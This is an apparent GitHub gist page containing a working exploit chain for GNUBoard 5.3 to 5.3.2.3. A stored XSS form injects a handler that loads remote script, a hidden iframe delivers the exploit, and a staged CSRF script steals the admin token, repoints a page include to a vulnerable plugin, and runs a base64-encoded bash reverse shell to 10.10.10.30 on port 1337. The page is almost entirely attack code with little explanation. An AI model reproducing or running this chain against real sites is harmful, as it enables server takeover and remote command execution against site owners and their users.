Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
GNUBoard RCE ~2019.1
<!--
Stored XSS (2019.01.02)
-->
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST">
<input type='hidden' name='fg_no' value=''>
<input type='hidden' name='fg_name' id='payload' value=''>
</form>
<script>
var random = Math.round(Math.random() * 1000000000);
var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin
document.getElementById('payload').value = '" onfocus="$.getScript(\'' + script_url + '\')//10.10.10.60/' + random + '" autofocus value=미분류 ';
document.forms[0].submit();
</script>
<!--
Exploit start
-->
<!doctype html>
<html>
<head>
<title>gnuboard5</title>
</head>
<body>
<h1>GNUBoard 5.3.2.3 RCE (Authenticated)</h1>
Date: 2019-01-01<br>
Affected Browsers: Chrome/Firefox/Edge<br>
Affected Version: 5.3 ~ 5.3.2.3<br>
<!-- Hide and load exploit.html -->
<iframe id="iframe" src="exploit.html" style="width:100px; height:100px; border:0; border:none; position:absolute; top: -1000px; left: -2000px;"></iframe>
</body>
</html>
/*
CSRF -> RCE Script
*/
// Linux Server reverse shell -- Change it to your preferred option
// base64 encoded of command ( /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.30/1337 0>&1' )
var cmd = 'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEwLjMwLzEzMzcgMD4mMSc=';
var ajax_token = '';
var co_id = 'community';
function stage3(){
// Stage3 : Execute command
cmd = encodeURIComponent(cmd);
var xhr = new XMLHttpRequest();
xhr.open('GET', '../../bbs/content.php?co_id=' + co_id + '&exe=echo ' + cmd + '|base64 -d|bash;%23', true);
xhr.send(null);
}
function stage2(){
// Stage2 : upload vulnerable script
post_data = 'w=&co_html=1&token=' + ajax_token + '&co_id=' + co_id + '&co_subject=커뮤니티&co_content=community&co_mobile_content=&co_skin=basic&co_mobile_skin=basic&co_tag_filter_user=0&co_include_head=../plugin/okname/hpcert1.php&co_include_tail=&captcha_key=&co_himg=&co_timg=';
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
stage3();
}
}
xhr.open('POST', '../contentformupdate.php', true);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(post_data);
}
function stage1(){
// Stage1 : Get admin token
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
ajax_token = xhr.responseText.split('"token":"')[1].split('"')[0];
stage2();
}
}
xhr.open('GET', '../ajax.token.php', true);
xhr.send(null);
}
// Start from stage1
stage1();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.